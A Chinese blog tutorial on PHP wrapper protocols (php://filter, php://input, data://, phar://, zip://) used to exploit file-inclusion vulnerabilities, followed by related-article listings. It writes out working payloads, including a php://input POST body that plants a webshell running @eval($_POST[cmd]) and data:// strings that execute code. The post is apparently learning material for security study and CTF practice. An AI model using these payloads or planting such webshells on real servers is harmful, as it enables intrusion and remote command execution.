文件包含漏洞-伪协议

已于 2023-10-15 22:37:00 修改
阅读量242 收藏 2
点赞数
分类专栏: web安全 # 文件包含 文章标签: 网络安全
于 2023-10-15 22:32:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53303754/article/details/133848713
版权

文件包含漏洞-伪协议

File://伪协议

  • file:// — 用于访问本地文件系统
  • php版本:5.0以上
  • 是 PHP 使用的默认封装协议
  • 当指定了一个相对路径(不以/、\、\\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录
    在这里插入图片描述

在这里插入图片描述

php://filter伪协议

  1. php://filter 伪协议用于数据流打开时的筛选过滤应用
  2. php://filter类似于readfile(),file_get_contents().设计用于数据流打开时的筛选过滤应用
  3. php 版本:5.0以上
  4. 该协议的语法:php://filter:/<action>=<name>
    在这里插入图片描述

5.php://filter的参数列表

参数功能
read读取
write写入
resource数据来源

6.read参数值可为

  • string.strip_tags:将数据流中的所有html标签清除
  • string.toupper:将数据流中的内容转换为大写
  • string.tolower:将数据流中的内容转换为小写
  • convert.base64-encode:将数据流中的内容转换为base64编码

7.利用方式:

php://filter/read=convert.base64-encode/resource=phpinfo.txt

php://filter伪协议示例:
在这里插入图片描述

php://input伪协议

1、php://input 是个可以访问请求的原始数据只读流

利用条件:

allow_url_fopen 不做要求;

allow_url_include = On

2、使用版本:5.6.0 php://input 可反复使用。

3、利用姿势:

POST 以下数据:

<?php fputs(fopen(‘shell.php’,‘w’),‘<?php @eval($_POST[cmd])?>’);?>

BP抓包上传写入shell.php文件

在这里插入图片描述

cmd调用查看目录

在这里插入图片描述

data://伪协议

data:// — 数据

使用版本: PHP 5.2.0 起 data: 数据流封装器开始有效。

用法:

data://text/plain,<?php phpinfo();?>

data://text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
在这里插入图片描述

在这里插入图片描述

http://伪协议

  1. http:// – https:// — 访问 HTTP(s) 网址
  2. 允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源。
  3. HTTP 请求会附带一个 Host: 头,用于兼容基于域名的虚拟主机。 如果在你的 php.ini 文件中或字节流上下文(context)配置了 user_agent 字符串,它也会被包含在请求之中。
  4. 利用条件:allow_url_fopen=On; allow_url_include = On
    在这里插入图片描述

phar 伪协议

(1)phar协议的作用是归档,自 PHP 5.3.0 起开始有效

(2)Phar归档文件最有特色的特点是可以方便地将多个文件分组为一个文件。这样,phar归档文件提供了一种将完整的PHP应用程序分发到单个文件中并从该文件运行它的方法,而无需将其提取到磁盘中。

(3)phar 可以处理 tar,zip和phar文件
在这里插入图片描述

phar伪协议的利用方式

phar://phpinfo.zip/phpinfo.txt

注意事项:

(1)压缩包中文件的名字要和后面的一样

(2)压缩包在压缩后还可以改后缀名

其他归档压缩类扩展

Bzip2、zip、LZF等

zlib:// – bzip2:// – zip:// — 压缩流

compress.zlib://file.gz

compress.bzip2://file.bz2

zip://archive.zip#dir/file.txt

zip://伪协议

(1)使用条件:
PHP>=5.3.0,注意在windows下测试要5.3.0<PHP<5.4才可以。在浏览器中#要编码为%23, 否则浏览器默认不会传输特殊字符。
(2)利用方式:
zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
zip://xxx.zip#shell.txt
zip://xxx.png#shell.php

Mamba-
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客大挑战 2019]Secret File伪协议读取文件/文件包含漏洞
weixin_45253573的博客
11-09 389
打开环境 右键查看源码 <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a> 访问该路径 http://82c21579-ae72-4b1e-9ed7-99f52e71862f.node3.buuoj.cn/Archive_ro
【web安全】文件包含漏洞
weixin_67259816的博客
05-30 1234
该篇文章主要介绍一下文件包含漏洞的概念,成因,防御手法和一些攻击思路以及攻击方法
文件包含时涉及PHP伪协议总结
最新发布
qq_43256965的博客
05-14 1075
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
file 协议
LuckXinXin的博客
04-16 694
其实在一开始接触 html开发,就已经使用了 file 协议 只不过你当时没有“协议”“标准”等这些概念
Web安全之PHP的伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2049
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
文件包含中PHP伪协议学习笔记
2302_80935968的博客
03-22 894
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1475
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
信息安全技术基础:本地文件包含漏洞.pptx
11-01
【信息安全技术基础:本地文件包含漏洞】 在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许...
信息安全技术:PHP伪协议.pptx
11-01
PHAR文件可以包含整个项目,便于分发和部署,但应确保对PHAR的签名验证以防止恶意代码注入。 8. rar:// - RAR `rar://`协议允许PHP脚本直接操作RAR文件,但这通常不是PHP的标准特性,需要额外的扩展支持。 9. ...
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞; PHP包含读文件; PHP包含写文件; PHP包含日志文件; PHP截断包含;...
iOS6.1、6.1.2和6.1.3(伪激活文件)
06-21
本话题聚焦于iOS的三个特定版本:6.1、6.1.2和6.1.3,以及与之相关的“伪激活文件”。这些文件在破解和越狱社区中扮演着特殊的角色,主要服务于那些希望绕过苹果官方激活流程的用户。 首先,我们需要理解什么是iOS ...
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3623
一些比较常用的php伪协议用法及部分演示过程
File Inclusion(文件包含漏洞)学习 / 伪协议
Goodric的博客
01-25 2398
file inclusion(文件包含漏洞) 在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 通过文件包含函数将文件包含进来,直接使用包含文件中的代码。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但有些时候,使用函数包含文件时,被包含的文件就设置为了函数的变量。 通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。 通常文件包含
PHP伪协议
qq_62604985的博客
07-10 1170
php伪协议,就是php支持的协议和封装协议file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流但是需要注意的是,当使用网络路径进行访问时,需要allow_url_fopen和allow_url_include都为ON。
文件包含伪协议总结备忘录
告白的博客
01-16 2072
0x00 文件包含漏洞 漏洞参数原因:源码采用include危险函数,传入对象参数由用户输入控制,可访问上传的包含文件页面 漏洞利用前提:知道包含文件解析的绝对路径,可访问绝对路径页面 常见的为协议分类: file:// 访问本地文件系统 http:// 访问 HTTPs 网址 ftp:// 访问 ftp URL Php:// 访问输入输出流 Zlib:// 压缩流 Data:// 数据 Ssh2:// security shell2 Expect:// 处理交互式的流 Glob://
文件包含-伪协议filter
08-22
伪协议filter是一种用于文件包含伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值